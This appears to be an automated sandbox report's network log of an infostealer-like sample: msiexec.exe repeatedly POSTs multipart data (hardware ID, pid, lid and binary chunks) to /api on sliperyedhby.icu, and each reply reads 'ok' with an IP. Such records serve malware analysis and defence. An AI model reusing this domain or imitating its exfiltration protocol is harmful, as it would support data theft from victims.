                                                                                                                                                                                                                              CF-RAY: 8e436c377f8251ef-DEN
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=18917&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13792&delivery_rate=153033&cwnd=32&unsent_bytes=0&cid=5c5850a13d2cafee&ts=614&x=0"
                                                                                                                                                                                                                              2024-11-17 23:15:26 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 0d 0a
                                                                                                                                                                                                                              Data Ascii: 11ok 173.254.250.70
                                                                                                                                                                                                                              2024-11-17 23:15:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              3192.168.2.1649708172.67.131.2544437084C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-11-17 23:15:27 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=4CWKL50BXAXU
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Content-Length: 15044
                                                                                                                                                                                                                              Host: sliperyedhby.icu
                                                                                                                                                                                                                              2024-11-17 23:15:27 UTC15044OUTData Raw: 2d 2d 34 43 57 4b 4c 35 30 42 58 41 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 31 34 46 37 31 30 39 42 42 34 30 31 32 32 45 31 33 41 38 38 33 44 39 35 41 43 33 41 38 34 0d 0a 2d 2d 34 43 57 4b 4c 35 30 42 58 41 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 43 57 4b 4c 35 30 42 58 41 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 32 32 32 6e 65 77 0d 0a 2d 2d 34 43 57 4b 4c 35 30 42 58 41 58 55 0d
                                                                                                                                                                                                                              Data Ascii: --4CWKL50BXAXUContent-Disposition: form-data; name="hwid"A714F7109BB40122E13A883D95AC3A84--4CWKL50BXAXUContent-Disposition: form-data; name="pid"2--4CWKL50BXAXUContent-Disposition: form-data; name="lid"tLYMe5--222new--4CWKL50BXAXU
                                                                                                                                                                                                                              2024-11-17 23:15:27 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:27 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=c4rdcr3uimjm89n0ldusaequbr; expires=Thu, 13-Mar-2025 17:02:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0lVTjtsrcZtuWzm5MHD7R4BtY4se1scH6p0zDOQ0TlANyvm0vhgc0%2Bp3Urb2vfIiHE3tFJN%2FM8meIIXDKE9y%2FOW2RgUh5QIXCZfeQpKqSiRG9LTu8a0rVpfRCooVh6qcZAyk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c407e6a6b0a-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1851&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2842&recv_bytes=15978&delivery_rate=1544533&cwnd=251&unsent_bytes=0&cid=5df180f29fded59b&ts=603&x=0"
                                                                                                                                                                                                                              2024-11-17 23:15:27 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 0d 0a
                                                                                                                                                                                                                              Data Ascii: 11ok 173.254.250.70
                                                                                                                                                                                                                              2024-11-17 23:15:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              4192.168.2.1649709172.67.131.2544437084C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-11-17 23:15:28 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=WQY78TW6YBE83BZ74EO
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Content-Length: 20429
                                                                                                                                                                                                                              Host: sliperyedhby.icu
                                                                                                                                                                                                                              2024-11-17 23:15:28 UTC15331OUTData Raw: 2d 2d 57 51 59 37 38 54 57 36 59 42 45 38 33 42 5a 37 34 45 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 31 34 46 37 31 30 39 42 42 34 30 31 32 32 45 31 33 41 38 38 33 44 39 35 41 43 33 41 38 34 0d 0a 2d 2d 57 51 59 37 38 54 57 36 59 42 45 38 33 42 5a 37 34 45 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 51 59 37 38 54 57 36 59 42 45 38 33 42 5a 37 34 45 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 32 32
                                                                                                                                                                                                                              Data Ascii: --WQY78TW6YBE83BZ74EOContent-Disposition: form-data; name="hwid"A714F7109BB40122E13A883D95AC3A84--WQY78TW6YBE83BZ74EOContent-Disposition: form-data; name="pid"3--WQY78TW6YBE83BZ74EOContent-Disposition: form-data; name="lid"tLYMe5--22
                                                                                                                                                                                                                              2024-11-17 23:15:28 UTC5098OUTData Raw: 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 60 14 2c 6c fa 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii: (X&7~`aO`,li`M?lrQMn 64
                                                                                                                                                                                                                              2024-11-17 23:15:29 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:29 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=7g2p7rjuc9uea2quovdhfkkv3t; expires=Thu, 13-Mar-2025 17:02:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2w0R2dk6%2B1UrHQzldRCYmGyaRLEmAcFPOzgCC7xgdgAChtPrunaY2orCF%2BWcmE37M8Y6zRjke7StgttMaoSHWPaoMsDFwiYmG%2Bgb6ES6DmoFPEhFBG8Hz%2BJd9GN5S529dVbq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c49af5246cc-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1048&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21392&delivery_rate=2691449&cwnd=243&unsent_bytes=0&cid=2cdb8e9ff697d909&ts=776&x=0"
                                                                                                                                                                                                                              2024-11-17 23:15:29 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 0d 0a
                                                                                                                                                                                                                              Data Ascii: 11ok 173.254.250.70
                                                                                                                                                                                                                              2024-11-17 23:15:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              5192.168.2.1649710172.67.131.2544437084C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-11-17 23:15:30 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=HA08J9ZOLZ5
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Content-Length: 5419
                                                                                                                                                                                                                              Host: sliperyedhby.icu
                                                                                                                                                                                                                              2024-11-17 23:15:30 UTC5419OUTData Raw: 2d 2d 48 41 30 38 4a 39 5a 4f 4c 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 31 34 46 37 31 30 39 42 42 34 30 31 32 32 45 31 33 41 38 38 33 44 39 35 41 43 33 41 38 34 0d 0a 2d 2d 48 41 30 38 4a 39 5a 4f 4c 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 41 30 38 4a 39 5a 4f 4c 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 32 32 32 6e 65 77 0d 0a 2d 2d 48 41 30 38 4a 39 5a 4f 4c 5a 35 0d 0a 43 6f 6e
                                                                                                                                                                                                                              Data Ascii: --HA08J9ZOLZ5Content-Disposition: form-data; name="hwid"A714F7109BB40122E13A883D95AC3A84--HA08J9ZOLZ5Content-Disposition: form-data; name="pid"1--HA08J9ZOLZ5Content-Disposition: form-data; name="lid"tLYMe5--222new--HA08J9ZOLZ5Con
                                                                                                                                                                                                                              2024-11-17 23:15:31 UTC1009INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:31 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=u2pojcer95jm8blst8e886h755; expires=Thu, 13-Mar-2025 17:02:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S7u35ul9KfpAEVCgwoYCtr6Z1XIzAjK6czC%2FI5P1NAiCxCPhiYhif6DnPw3YGqaGuJMc7oA9Vvqay0dbkdNaLOXak%2FzfmI8BDK6ym8ldIqhE65k5mZ7X7%2FBLowZCpaMbEqIK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c53ccb76c3a-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1351&sent=6&recv=11&lost=0&retrans=0&sent_bytes=2840&recv_bytes=6329&delivery_rate=2214067&cwnd=251&unsent_bytes=0&cid=c7a0075e31b37fcd&ts=616&x=0"
                                                                                                                                                                                                                              2024-11-17 23:15:31 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 0d 0a
                                                                                                                                                                                                                              Data Ascii: 11ok 173.254.250.70
                                                                                                                                                                                                                              2024-11-17 23:15:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              6192.168.2.1649711172.67.131.2544437084C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-11-17 23:15:31 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=MUISZHMAEL50RMO2
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Content-Length: 5473
                                                                                                                                                                                                                              Host: sliperyedhby.icu
                                                                                                                                                                                                                              2024-11-17 23:15:31 UTC5473OUTData Raw: 2d 2d 4d 55 49 53 5a 48 4d 41 45 4c 35 30 52 4d 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 31 34 46 37 31 30 39 42 42 34 30 31 32 32 45 31 33 41 38 38 33 44 39 35 41 43 33 41 38 34 0d 0a 2d 2d 4d 55 49 53 5a 48 4d 41 45 4c 35 30 52 4d 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 55 49 53 5a 48 4d 41 45 4c 35 30 52 4d 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 32 32 32 6e 65 77 0d 0a 2d 2d 4d
                                                                                                                                                                                                                              Data Ascii: --MUISZHMAEL50RMO2Content-Disposition: form-data; name="hwid"A714F7109BB40122E13A883D95AC3A84--MUISZHMAEL50RMO2Content-Disposition: form-data; name="pid"1--MUISZHMAEL50RMO2Content-Disposition: form-data; name="lid"tLYMe5--222new--M
                                                                                                                                                                                                                              2024-11-17 23:15:32 UTC1009INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:32 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=vchm7ppuntfet87jkndqv3ts8c; expires=Thu, 13-Mar-2025 17:02:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zq3eJFUdrG%2FDTfj5TXSlSciZUOwDA5iqHo3mh1G55JON8PJ10C7mzDHuU4ceQFuEzoM2EnNPWBs5yecYRCqQpH1zeb1vMabrIY0pdbVZwdSYt%2F5fXby%2BbHJzYRQopmqr5myH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c5c0943e70a-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2066&sent=6&recv=11&lost=0&retrans=0&sent_bytes=2840&recv_bytes=6388&delivery_rate=1392307&cwnd=243&unsent_bytes=0&cid=1a0a9f335e169206&ts=530&x=0"
                                                                                                                                                                                                                              2024-11-17 23:15:32 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 0d 0a
                                                                                                                                                                                                                              Data Ascii: 11ok 173.254.250.70
                                                                                                                                                                                                                              2024-11-17 23:15:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              7192.168.2.1649712172.67.131.2544437084C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-11-17 23:15:33 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=Z0N24YS7X
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Content-Length: 1150
                                                                                                                                                                                                                              Host: sliperyedhby.icu
                                                                                                                                                                                                                              2024-11-17 23:15:33 UTC1150OUTData Raw: 2d 2d 5a 30 4e 32 34 59 53 37 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 31 34 46 37 31 30 39 42 42 34 30 31 32 32 45 31 33 41 38 38 33 44 39 35 41 43 33 41 38 34 0d 0a 2d 2d 5a 30 4e 32 34 59 53 37 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 30 4e 32 34 59 53 37 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 32 32 32 6e 65 77 0d 0a 2d 2d 5a 30 4e 32 34 59 53 37 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                                                                                                                                                              Data Ascii: --Z0N24YS7XContent-Disposition: form-data; name="hwid"A714F7109BB40122E13A883D95AC3A84--Z0N24YS7XContent-Disposition: form-data; name="pid"1--Z0N24YS7XContent-Disposition: form-data; name="lid"tLYMe5--222new--Z0N24YS7XContent-Dis
                                                                                                                                                                                                                              2024-11-17 23:15:33 UTC1010INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:33 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ugejefg573vth5tmnnnoipq5an; expires=Thu, 13-Mar-2025 17:02:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kXGHAq7K5K9vm4aPHhmbr7b0LCNfFzS00czAmZWfJ5CDcrSMUIiLrNEUqze3CN%2Fqol%2BAeBv8zx5bTNPspcgL7uuh%2BZJew3ZYVNixpvHPArYD7O3iejuCicKrjajshJISFN%2BL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c645ceb6c5e-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1697&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2058&delivery_rate=1707547&cwnd=247&unsent_bytes=0&cid=d79429597939705e&ts=543&x=0"
                                                                                                                                                                                                                              2024-11-17 23:15:33 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 0d 0a
                                                                                                                                                                                                                              Data Ascii: 11ok 173.254.250.70
                                                                                                                                                                                                                              2024-11-17 23:15:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              8192.168.2.1649713172.67.131.2544437084C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-11-17 23:15:34 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=VS4N0X5BF
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Content-Length: 1066
                                                                                                                                                                                                                              Host: sliperyedhby.icu
                                                                                                                                                                                                                              2024-11-17 23:15:34 UTC1066OUTData Raw: 2d 2d 56 53 34 4e 30 58 35 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 31 34 46 37 31 30 39 42 42 34 30 31 32 32 45 31 33 41 38 38 33 44 39 35 41 43 33 41 38 34 0d 0a 2d 2d 56 53 34 4e 30 58 35 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 53 34 4e 30 58 35 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 32 32 32 6e 65 77 0d 0a 2d 2d 56 53 34 4e 30 58 35 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                                                                                                                                                              Data Ascii: --VS4N0X5BFContent-Disposition: form-data; name="hwid"A714F7109BB40122E13A883D95AC3A84--VS4N0X5BFContent-Disposition: form-data; name="pid"1--VS4N0X5BFContent-Disposition: form-data; name="lid"tLYMe5--222new--VS4N0X5BFContent-Dis
                                                                                                                                                                                                                              2024-11-17 23:15:34 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:34 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=oj0vu00bkoc4bitps6bfio8dcg; expires=Thu, 13-Mar-2025 17:02:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AlK5SiyqZvKHdtL2F6gzCQS5WP0qLipLGQr0zturUJXeU9FIlQLJMgO%2FProL%2Bb5SrADR84%2BsZsZn3Nr%2B%2BstZ93jH%2FidjJf3tirqXdzVJL%2FTMrt2qa0NxnSiBUPUr75OsPGT9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c6c8cd7e745-DEN
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=19906&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1974&delivery_rate=154181&cwnd=32&unsent_bytes=0&cid=1cf3a0d4a0fb7e07&ts=399&x=0"
                                                                                                                                                                                                                              2024-11-17 23:15:34 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 0d 0a
                                                                                                                                                                                                                              Data Ascii: 11ok 173.254.250.70
                                                                                                                                                                                                                              2024-11-17 23:15:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              9192.168.2.1649714172.67.131.2544437084C:\Windows\SysWOW64\msiexec.exe
